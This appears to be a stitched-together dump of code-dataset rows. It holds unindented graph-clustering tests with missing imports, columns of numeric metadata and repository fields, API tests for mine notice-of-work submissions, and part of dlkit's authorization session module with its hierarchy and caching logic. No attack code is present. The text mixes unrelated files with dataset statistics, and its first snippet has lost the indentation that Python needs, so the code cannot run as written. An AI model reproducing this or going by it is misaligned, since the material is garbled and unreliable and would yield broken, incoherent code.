from cops.clustering import ClusterProblem, ClusterStructure, inflate_agent_clusters
def test_activationinflate1():
G = Graph()
G.add_connectivity_path([0, 1])
G.add_connectivity_path([0, 2])
agent_positions = {0: 0, 1: 1, 2: 2}
G.init_agents(agent_positions)
cs = ClusterStructure(agent_clusters={"c0": [0], "c1": [1], "c2": [2]})
master = 0
cp = ClusterProblem()
cp.graph = G
cp.master = master
cp.prepare_problem(remove_dead=False)
cs = inflate_agent_clusters(cp, cs)
np.testing.assert_equal(cs.subgraphs["c0"], set([0]))
np.testing.assert_equal(cs.subgraphs["c1"], set([1]))
np.testing.assert_equal(cs.subgraphs["c2"], set([2]))
np.testing.assert_equal(cs.child_clusters["c0"], {("c1", 1), ("c2", 2)})
np.testing.assert_equal(cs.child_clusters["c1"], set())
np.testing.assert_equal(cs.child_clusters["c2"], set())
np.testing.assert_equal(cs.parent_clusters["c1"], ("c0", 0))
np.testing.assert_equal(cs.parent_clusters["c2"], ("c0", 0))
def test_inflate2():
G = Graph()
G.add_transition_path(list(range(0, 12)))
G.add_connectivity_path(list(range(0, 12)))
G.add_connectivity_path([6, 8])
agent_positions = {0: 0, 1: 1, 2: 4, 3: 6, 4: 8, 5: 10}
G.init_agents(agent_positions)
cs = ClusterStructure(agent_clusters={"c0": [0, 1], "c1": [2, 3], "c2": [4, 5]})
master = 0
cp = ClusterProblem()
cp.graph = G
cp.master = master
cp.prepare_problem(remove_dead=False)
cs = inflate_agent_clusters(cp, cs)
np.testing.assert_equal(cs.subgraphs["c0"], set([0, 1, 2, 3]))
np.testing.assert_equal(cs.subgraphs["c1"], set([4, 5, 6, 7]))
np.testing.assert_equal(cs.subgraphs["c2"], set([8, 9, 10, 11]))
np.testing.assert_equal(cs.child_clusters["c0"], {("c1", 4)})
np.testing.assert_equal(cs.child_clusters["c1"], {("c2", 8)})
np.testing.assert_equal(cs.child_clusters["c2"], set())
np.testing.assert_equal(cs.parent_clusters["c1"], ("c0", 3))
np.testing.assert_equal(cs.parent_clusters["c2"], ("c1", 6))
| 31.686567
| 84
| 0.646726
| 323
| 2,123
| 4.077399
| 0.179567
| 0.109339
| 0.182232
| 0.242976
| 0.823083
| 0.791192
| 0.786636
| 0.757783
| 0.53303
| 0.422172
| 0
| 0.055681
| 0.162506
| 2,123
| 66
| 85
| 32.166667
| 0.685039
| 0
| 0
| 0.391304
| 0
| 0
| 0.028262
| 0
| 0
| 0
| 0
| 0
| 0.347826
| 1
| 0.043478
| false
| 0
| 0.065217
| 0
| 0.108696
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
c896cf21816f76cd01ad1bacb6b82f675af14297
| 12,510
|
py
|
Python
|
services/core-api/tests/now_submissions/resources/test_application_resource.py
|
parc-jason/mds
|
8f181a429442208a061ed72065b71e6c2bd0f76f
|
[
"Apache-2.0"
] | 25
|
2018-07-09T19:04:37.000Z
|
2022-03-15T17:27:10.000Z
|
services/core-api/tests/now_submissions/resources/test_application_resource.py
|
parc-jason/mds
|
8f181a429442208a061ed72065b71e6c2bd0f76f
|
[
"Apache-2.0"
] | 983
|
2018-04-25T20:08:07.000Z
|
2022-03-31T21:45:20.000Z
|
services/core-api/tests/now_submissions/resources/test_application_resource.py
|
parc-jason/mds
|
8f181a429442208a061ed72065b71e6c2bd0f76f
|
[
"Apache-2.0"
] | 58
|
2018-05-15T22:35:50.000Z
|
2021-11-29T19:40:52.000Z
|
import json
from tests.factories import (NOWSubmissionFactory, MineFactory, NOWClientFactory,
NOWApplicationIdentityFactory)
class TestGetApplicationResource:
"""GET /now-submissions/applications/{application_guid}"""
def test_get_now_submission_by_guid_success(self, test_client, db_session, auth_headers):
"""Should return the correct records with a 200 response code"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['now_application_guid'] is not None
assert get_data['now_application_guid'] == str(identity.now_application_guid)
def test_get_now_submission_by_guid_mine_name(self, test_client, db_session, auth_headers):
"""Should include the correct mine name"""
mine = MineFactory()
now_submission = NOWSubmissionFactory(mine=mine)
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['mine_name'] is not None
assert get_data['mine_name'] == mine.mine_name
def test_get_now_submission_by_guid_applicant(self, test_client, db_session, auth_headers):
"""Should include the correct applicant"""
applicant = NOWClientFactory()
now_submission = NOWSubmissionFactory(applicant=applicant)
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['applicant']['type'] is not None
assert get_data['applicant']['type'] == applicant.type
def test_get_now_submission_by_guid_submitter(self, test_client, db_session, auth_headers):
"""Should include the correct submitter"""
submitter = NOWClientFactory()
now_submission = NOWSubmissionFactory(submitter=submitter)
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['submitter']['type'] is not None
assert get_data['submitter']['type'] == submitter.type
def test_get_now_submission_by_guid_documents(self, test_client, db_session, auth_headers):
"""Should include the correct documents"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['documents'][0]['filename'] is not None
assert get_data['documents'][0]['filename'] in list(
map(lambda x: x.filename, now_submission.documents))
def test_get_now_submission_by_guid_contacts(self, test_client, db_session, auth_headers):
"""Should include the correct contacts"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['contacts'][0]['type'] is not None
assert get_data['contacts'][0]['type'] in list(
map(lambda x: x.type, now_submission.contacts))
def test_get_now_submission_by_guid_existing_placer_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct existing_placer_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['existing_placer_activity'][0]['type'] is not None
assert get_data['existing_placer_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.existing_placer_activity))
def test_get_now_submission_by_guid_proposed_placer_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct proposed_placer_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['proposed_placer_activity'][0]['type'] is not None
assert get_data['proposed_placer_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.proposed_placer_activity))
def test_get_now_submission_by_guid_existing_settling_pond(self, test_client, db_session,
auth_headers):
"""Should include the correct existing_settling_pond"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['existing_settling_pond'][0]['pondid'] is not None
assert get_data['existing_settling_pond'][0]['pondid'] in list(
map(lambda x: x.pondid, now_submission.existing_settling_pond))
def test_get_now_submission_by_guid_proposed_settling_pond(self, test_client, db_session,
auth_headers):
"""Should include the correct proposed_settling_pond"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['proposed_settling_pond'][0]['pondid'] is not None
assert get_data['proposed_settling_pond'][0]['pondid'] in list(
map(lambda x: x.pondid, now_submission.proposed_settling_pond))
def test_get_now_submission_by_guid_sand_grv_qry_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct sand_grv_qry_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['sand_grv_qry_activity'][0]['type'] is not None
assert get_data['sand_grv_qry_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.sand_grv_qry_activity))
def test_get_now_submission_by_guid_under_exp_new_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct under_exp_new_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['under_exp_new_activity'][0]['type'] is not None
assert get_data['under_exp_new_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.under_exp_new_activity))
def test_get_now_submission_by_guid_under_exp_rehab_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct under_exp_rehab_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['under_exp_rehab_activity'][0]['type'] is not None
assert get_data['under_exp_rehab_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.under_exp_rehab_activity))
def test_get_now_submission_by_guid_under_exp_surface_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct under_exp_surface_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['under_exp_surface_activity'][0]['type'] is not None
assert get_data['under_exp_surface_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.under_exp_surface_activity))
def test_get_now_submission_by_guid_water_source_activity(self, test_client, db_session,
auth_headers):
"""Should include the correct water_source_activity"""
now_submission = NOWSubmissionFactory()
identity = NOWApplicationIdentityFactory(now_submission=now_submission)
get_resp = test_client.get(
f'/now-submissions/applications/{identity.now_application_guid}',
headers=auth_headers['full_auth_header'])
assert get_resp.status_code == 200, get_resp.response
get_data = json.loads(get_resp.data.decode())
assert get_data['water_source_activity'][0]['type'] is not None
assert get_data['water_source_activity'][0]['type'] in list(
map(lambda x: x.type, now_submission.water_source_activity))
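# The GET tests above all repeat one fetch-and-decode pattern. A minimal sketch
# of a module-level helper that would factor it out (the helper name is
# hypothetical; the factories and fixtures are the ones used above):
def fetch_now_submission(test_client, auth_headers):
    """Create a NOW submission, GET it from the API, return (model, response dict)."""
    now_submission = NOWSubmissionFactory()
    identity = NOWApplicationIdentityFactory(now_submission=now_submission)
    get_resp = test_client.get(
        f'/now-submissions/applications/{identity.now_application_guid}',
        headers=auth_headers['full_auth_header'])
    assert get_resp.status_code == 200, get_resp.response
    return now_submission, json.loads(get_resp.data.decode())
# A documents-style test then reduces to:
#     now_submission, get_data = fetch_now_submission(test_client, auth_headers)
#     assert get_data['documents'][0]['filename'] in [d.filename for d in now_submission.documents]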
| 55.110132 | 97 | 0.681455 | 1,463 | 12,510 | 5.470267 | 0.057416 | 0.115332 | 0.048732 | 0.051981 | 0.907035 | 0.899538 | 0.878171 | 0.864426 | 0.828814 | 0.781832 | 0 | 0.007223 | 0.22534 | 12,510 | 226 | 98 | 55.353982 | 0.818595 | 0.060192 | 0 | 0.627119 | 0 | 0 | 0.155447 | 0.113652 | 0 | 0 | 0 | 0 | 0.254237 | 1 | 0.084746 | false | 0 | 0.011299 | 0 | 0.101695 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c8b4dfd0fac657e7ac7e488ed975872bacfb263c | 25 | py | Python | manager/__init__.py | monocleface/viewer | 8ab47a9e846bd2716fe0208c34f33565513fc3f6 | ["Apache-2.0"] | 6 | 2020-02-28T21:18:16.000Z | 2020-03-13T16:45:57.000Z | manager/__init__.py | monocleface/viewer | 8ab47a9e846bd2716fe0208c34f33565513fc3f6 | ["Apache-2.0"] | 6 | 2020-02-28T12:42:52.000Z | 2020-03-16T03:49:09.000Z | manager/__init__.py | monocleface/viewer | 8ab47a9e846bd2716fe0208c34f33565513fc3f6 | ["Apache-2.0"] | 6 | 2020-03-05T13:04:25.000Z | 2020-03-13T16:46:03.000Z |
from .utils import Config
| 25 | 25 | 0.84 | 4 | 25 | 5.25 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12 | 25 | 1 | 25 | 25 | 0.954545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c8ec940438930475725da4b1624b8e42cb723947 | 157 | py | Python | core/models/__init__.py | Brain-Engine/ImageNet | 893a8008e0e8e373bc66a7cbb40813db8495426a | ["Apache-2.0"] | 1 | 2021-05-17T11:49:12.000Z | 2021-05-17T11:49:12.000Z | core/models/__init__.py | Brain-Engine/ImageNet | 893a8008e0e8e373bc66a7cbb40813db8495426a | ["Apache-2.0"] | null | null | null | core/models/__init__.py | Brain-Engine/ImageNet | 893a8008e0e8e373bc66a7cbb40813db8495426a | ["Apache-2.0"] | 1 | 2021-05-17T11:49:22.000Z | 2021-05-17T11:49:22.000Z |
# import models from torchvision
from torchvision.models import *
# import models from efficientnet
from .efficientnet import b0, b1, b2, b3, b4, b5, b6, b7
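# Hypothetical usage sketch (not part of the original file): with the
# re-exports above, callers can pull every backbone from this one package.
# Constructor arguments for b0..b7 are assumptions; resnet18 comes from the
# torchvision star-import.
#     from core.models import b0, resnet18
#     effnet = b0()        # efficientnet-b0 factory re-exported above
#     baseline = resnet18()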
| 31.4 | 56 | 0.764331 | 23 | 157 | 5.217391 | 0.565217 | 0.2 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 0.159236 | 157 | 4 | 57 | 39.25 | 0.848485 | 0.394904 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
cdfbbb1e16902c1d3761509ecf7d21633da2152a | 161,322 | py | Python | dlkit/json_/authorization/sessions.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | ["MIT"] | 2 | 2018-02-23T12:16:11.000Z | 2020-10-08T17:54:24.000Z | dlkit/json_/authorization/sessions.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | ["MIT"] | 87 | 2017-04-21T18:57:15.000Z | 2021-12-13T19:43:57.000Z | dlkit/json_/authorization/sessions.py | UOC/dlkit | a9d265db67e81b9e0f405457464e762e2c03f769 | ["MIT"] | 1 | 2018-03-01T16:44:25.000Z | 2018-03-01T16:44:25.000Z |
"""JSON implementations of authorization sessions."""
# pylint: disable=no-init
# Numerous classes don't require __init__.
# pylint: disable=too-many-public-methods,too-few-public-methods
# Number of methods are defined in specification
# pylint: disable=protected-access
# Access to protected methods allowed in package json package scope
# pylint: disable=too-many-ancestors
# Inheritance defined in specification
from bson.objectid import ObjectId
from . import objects
from . import queries
from .. import utilities
from ..id.objects import IdList
from ..osid import sessions as osid_sessions
from ..osid.sessions import OsidSession
from ..primitives import DateTime
from ..primitives import Id
from ..primitives import Type
from ..utilities import JSONClientValidated
from ..utilities import PHANTOM_ROOT_IDENTIFIER
from ..utilities import overlap
from dlkit.abstract_osid.authorization import sessions as abc_authorization_sessions
from dlkit.abstract_osid.authorization.objects import AuthorizationForm as ABCAuthorizationForm
from dlkit.abstract_osid.authorization.objects import VaultForm as ABCVaultForm
from dlkit.abstract_osid.id.primitives import Id as ABCId
from dlkit.abstract_osid.osid import errors
from dlkit.abstract_osid.type.primitives import Type as ABCType
DESCENDING = -1
ASCENDING = 1
CREATED = True
UPDATED = True
ENCLOSURE_RECORD_TYPE = Type(
identifier='enclosure',
namespace='osid-object',
authority='ODL.MIT.EDU')
COMPARATIVE = 0
PLENARY = 1
class AuthorizationSession(abc_authorization_sessions.AuthorizationSession, osid_sessions.OsidSession):
"""This is the basic session for verifying authorizations."""
def __init__(self, catalog_id=None, proxy=None, runtime=None, **kwargs):
self._catalog_class = objects.Vault
self._catalog_name = 'Vault'
OsidSession._init_object(
self,
catalog_id,
proxy,
runtime,
db_name='authorization',
cat_name='Vault',
cat_class=objects.Vault)
self._kwargs = kwargs
# def _get_qualifier_idstrs(self, qualifier_id):
# def generate_qualifier_ids():
# try:
# authority = qualifier_id.get_identifier_namespace().split('.')[0].upper()
# identifier = qualifier_id.get_identifier_namespace().split('.')[1].upper()
# except:
# return [str(qualifier_id)]
# root_qualifier_id = Id(
# authority=qualifier_id.get_authority(),
# namespace=qualifier_id.get_identifier_namespace(),
# identifier='ROOT')
# if qualifier_id.get_identifier() == 'ROOT':
# return [str(root_qualifier_id)]
# hierarchy_mgr = self._get_provider_manager('HIERARCHY') # local=True ???
# hierarchy_session = hierarchy_mgr.get_hierarchy_traversal_session_for_hierarchy(
# Id(authority=authority,
# namespace='CATALOG',
# identifier=identifier),
# proxy=self._proxy)
# node = hierarchy_session.get_nodes(qualifier_id, 10, 0, False)
# return self._get_ancestor_idstrs(node) + [str(root_qualifier_id)]
# use_caching = False
# try:
# config = self._runtime.get_configuration()
# parameter_id = Id('parameter:useCachingForQualifierIds@mongo')
# if config.get_value_by_parameter(parameter_id).get_boolean_value():
# use_caching = True
# else:
# pass
# except (AttributeError, KeyError, errors.NotFound):
# pass
# if use_caching:
# import memcache
# mc = memcache.Client(['127.0.0.1:11211'], debug=0)
#
# key = 'hierarchy-qualifier-ids-{0}'.format(str(qualifier_id))
#
# if mc.get(key) is None:
# qualifier_ids = generate_qualifier_ids()
# mc.set(key, qualifier_ids, time=30 * 60)
# else:
# qualifier_ids = mc.get(key)
# else:
# qualifier_ids = generate_qualifier_ids()
# return qualifier_ids
#
# def _get_ancestor_idstrs(self, node):
# def get_ancestors(internal_node):
# node_list = [str(internal_node.get_id())]
# if internal_node.has_parents():
# for parent_node in internal_node.get_parents():
# node_list += self._get_ancestor_idstrs(parent_node)
# return list(set(node_list))
#
# use_caching = False
# try:
# config = self._runtime.get_configuration()
# parameter_id = Id('parameter:useCachingForQualifierIds@json')
# if config.get_value_by_parameter(parameter_id).get_boolean_value():
# use_caching = True
# else:
# pass
# except (AttributeError, KeyError, errors.NotFound):
# pass
# if use_caching:
# import memcache
# mc = memcache.Client(['127.0.0.1:11211'], debug=0)
#
# key = 'ancestor-ids-{0}'.format(str(node.ident))
#
# if mc.get(key) is None:
# ancestor_ids = get_ancestors(node)
# mc.set(key, ancestor_ids, time=30 * 60)
# else:
# ancestor_ids = mc.get(key)
# else:
# ancestor_ids = get_ancestors(node)
# return ancestor_ids
def _get_hierarchy_session(self, hierarchy_id):
"""Returns a hierarchy traversal session for the hierarchy"""
hierarchy_mgr = self._get_provider_manager('HIERARCHY', local=True)
return hierarchy_mgr.get_hierarchy_traversal_session_for_hierarchy(
hierarchy_id,
proxy=self._proxy)
def _caching_enabled(self):
"""Returns True if caching is enabled per configuration, false otherwise."""
try:
config = self._runtime.get_configuration()
parameter_id = Id('parameter:useCachingForQualifierIds@json')
if config.get_value_by_parameter(parameter_id).get_boolean_value():
return True
else:
return False
except (AttributeError, KeyError, errors.NotFound):
return False
def _get_parent_id_list(self, qualifier_id, hierarchy_id):
"""Returns list of parent id strings for qualifier_id in hierarchy.
Uses memcache if caching is enabled.
"""
if self._caching_enabled():
key = 'parent_id_list_{0}'.format(str(qualifier_id))
# If configured to use memcache as the caching engine, use it.
# Otherwise default to diskcache
caching_engine = 'diskcache'
try:
config = self._runtime.get_configuration()
parameter_id = Id('parameter:cachingEngine@json')
caching_engine = config.get_value_by_parameter(parameter_id).get_string_value()
except (AttributeError, KeyError, errors.NotFound):
pass
if caching_engine == 'memcache':
import memcache
caching_host = '127.0.0.1:11211'
try:
config = self._runtime.get_configuration()
parameter_id = Id('parameter:cachingHostURI@json')
caching_host = config.get_value_by_parameter(parameter_id).get_string_value()
except (AttributeError, KeyError, errors.NotFound):
pass
mc = memcache.Client([caching_host], debug=0)
parent_id_list = mc.get(key)
if parent_id_list is None:
parent_ids = self._get_hierarchy_session(hierarchy_id).get_parents(qualifier_id)
parent_id_list = [str(parent_id) for parent_id in parent_ids]
mc.set(key, parent_id_list)
elif caching_engine == 'diskcache':
import diskcache
with diskcache.Cache('/tmp/dlkit_cache') as cache:
# A little bit non-DRY, since it's almost the same as for memcache above.
# However, for diskcache.Cache, we have to call ".close()" or use a
# ``with`` statement to safeguard calling ".close()", so we keep this
# separate from the memcache implementation.
parent_id_list = cache.get(key)
if parent_id_list is None:
parent_ids = self._get_hierarchy_session(hierarchy_id).get_parents(qualifier_id)
parent_id_list = [str(parent_id) for parent_id in parent_ids]
cache.set(key, parent_id_list)
else:
raise errors.NotFound('The {0} caching engine was not found.'.format(caching_engine))
else:
parent_ids = self._get_hierarchy_session(hierarchy_id).get_parents(qualifier_id)
parent_id_list = [str(parent_id) for parent_id in parent_ids]
return parent_id_list
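# A standalone sketch of the get-or-compute caching pattern implemented above
# (illustrative only: the key format and cache path are taken from
# _get_parent_id_list, but this helper itself is not part of dlkit):
import diskcache

def cached_parent_ids(qualifier_id, compute_parents):
    """Return cached parent id strings for qualifier_id, computing them on a miss."""
    key = 'parent_id_list_{0}'.format(str(qualifier_id))
    with diskcache.Cache('/tmp/dlkit_cache') as cache:
        parent_id_list = cache.get(key)
        if parent_id_list is None:
            parent_id_list = [str(pid) for pid in compute_parents(qualifier_id)]
            cache.set(key, parent_id_list)
        return parent_id_list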
def get_vault_id(self):
"""Gets the ``Vault`` ``Id`` associated with this session.
return: (osid.id.Id) - the ``Vault Id`` associated with this
session
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin_id
return self._catalog_id
vault_id = property(fget=get_vault_id)
def get_vault(self):
"""Gets the ``Vault`` associated with this session.
return: (osid.authorization.Vault) - the ``Vault`` associated
with this session
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
# Implemented from template for osid.resource.ResourceLookupSession.get_bin
return self._catalog
vault = property(fget=get_vault)
def can_access_authorizations(self):
"""Tests if this user can perform authorization checks.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer lookup
operations to unauthorized users.
return: (boolean) - ``false`` if authorization methods are not
authorized, ``true`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return True
@utilities.arguments_not_none
def is_authorized(self, agent_id, function_id, qualifier_id):
"""Determines if the given agent is authorized.
An agent is authorized if an active authorization exists whose
``Agent,`` ``Function`` and ``Qualifier`` matches the supplied
parameters. Authorizations may be defined using groupings or
hierarchical structures for both the ``Agent`` and the
``Qualifier`` but are queried in the de-normalized form.
The ``Agent`` is generally determined through the use of an
Authentication OSID. The ``Function`` and ``Qualifier`` are
already known as they map to the desired authorization to
validate.
arg: agent_id (osid.id.Id): the ``Id`` of an ``Agent``
arg: function_id (osid.id.Id): the ``Id`` of a ``Function``
arg: qualifier_id (osid.id.Id): the ``Id`` of a ``Qualifier``
return: (boolean) - ``true`` if the user is authorized,
``false`` otherwise
raise: NotFound - ``function_id`` is not found
raise: NullArgument - ``agent_id`` , ``function_id`` or
``qualifier_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure making request
*compliance: mandatory -- This method must be implemented.*
*implementation notes*: Authorizations may be stored in a
normalized form with respect to various Resources and created
using specific nodes in a ``Function`` or ``Qualifier``
hierarchy. The provider needs to maintain a de-normalized
implicit authorization store or expand the applicable
hierarchies on the fly to honor this query. Querying the
authorization service may in itself require a separate
authorization. A ``PermissionDenied`` is a result of this
authorization failure. If no explicit or implicit authorization
exists for the queried tuple, this method should return
``false``.
"""
collection = JSONClientValidated('authorization',
collection='Authorization',
runtime=self._runtime)
def is_parent_authorized(catalog_id):
"""Recursively checks parents for implicit authorizations"""
parent_id_list = self._get_parent_id_list(catalog_id, hierarchy_id)
if parent_id_list:
try:
collection.find_one(
{'agentId': str(agent_id),
'functionId': str(function_id),
'qualifierId': {'$in': parent_id_list}})
except errors.NotFound:
for parent_id in parent_id_list:
if is_parent_authorized(Id(parent_id)):
return True
return False
else:
return True
else:
return False
# Check first for an explicit or 'ROOT' level implicit authorization:
try:
authority = qualifier_id.get_identifier_namespace().split('.')[0].upper()
identifier = qualifier_id.get_identifier_namespace().split('.')[1].upper()
except (KeyError, IndexError):  # split('.')[1] raises IndexError when there is no '.'
idstr_list = [str(qualifier_id)]
authority = identifier = None
else:
# handle aliased IDs
package_name = qualifier_id.get_identifier_namespace().split('.')[0]
qualifier_id = self._get_id(qualifier_id, package_name)
root_qualifier_id = Id(
authority=qualifier_id.get_authority(),
namespace=qualifier_id.get_identifier_namespace(),
identifier='ROOT')
idstr_list = [str(root_qualifier_id), str(qualifier_id)]
try:
collection.find_one(
{'agentId': str(agent_id),
'functionId': str(function_id),
'qualifierId': {'$in': idstr_list}})
# Otherwise check for implicit authorization through inheritance:
except errors.NotFound:
if authority and identifier:
hierarchy_id = Id(authority=authority,
namespace='CATALOG',
identifier=identifier)
return is_parent_authorized(qualifier_id)
else:
return False
else:
return True
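# Illustrative call (not in the original source): is_authorized answers a single
# (agent, function, qualifier) tuple; all three Id values below are made up.
#     agent_id = Id(authority='MIT-ODL', namespace='authentication.Agent', identifier='jane')
#     function_id = Id(authority='MIT-ODL', namespace='authorization.Function', identifier='lookup')
#     qualifier_id = Id(authority='MIT-ODL', namespace='authorization.Qualifier', identifier='ROOT')
#     session.is_authorized(agent_id, function_id, qualifier_id)  # -> True or False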
@utilities.arguments_not_none
def get_authorization_condition(self, function_id):
"""Gets the ``AuthorizationCondition`` for making conditional authorization checks.
arg: function_id (osid.id.Id): the ``Id`` of a ``Function``
return: (osid.authorization.AuthorizationCondition) - an
authorization condition
raise: NotFound - ``function_id`` is not found
raise: NullArgument - ``function_id`` is ``null``
raise: OperationFailed - unable to complete request
raise: PermissionDenied - authorization failure making request
*compliance: mandatory -- This method must be implemented.*
"""
raise errors.Unimplemented()
@utilities.arguments_not_none
def is_authorized_on_condition(self, agent_id, function_id, qualifier_id, condition):
"""Determines if the given agent is authorized.
An agent is authorized if an active authorization exists whose
``Agent,`` ``Function`` and ``Qualifier`` matches the supplied
parameters. Authorizations may be defined using groupings or
hierarchical structures for both the ``Agent`` and the
``Qualifier`` but are queried in the de-normalized form.
The ``Agent`` is generally determined through the use of an
Authentication OSID. The ``Function`` and ``Qualifier`` are
already known as they map to the desired authorization to
validate.
arg: agent_id (osid.id.Id): the ``Id`` of an ``Agent``
arg: function_id (osid.id.Id): the ``Id`` of a ``Function``
arg: qualifier_id (osid.id.Id): the ``Id`` of a ``Qualifier``
arg: condition (osid.authorization.AuthorizationCondition):
an authorization condition
return: (boolean) - ``true`` if the user is authorized,
``false`` otherwise
raise: NotFound - ``function_id`` is not found
raise: NullArgument - ``agent_id`` , ``function_id,
qualifier_id`` , or ``condition`` is ``null``
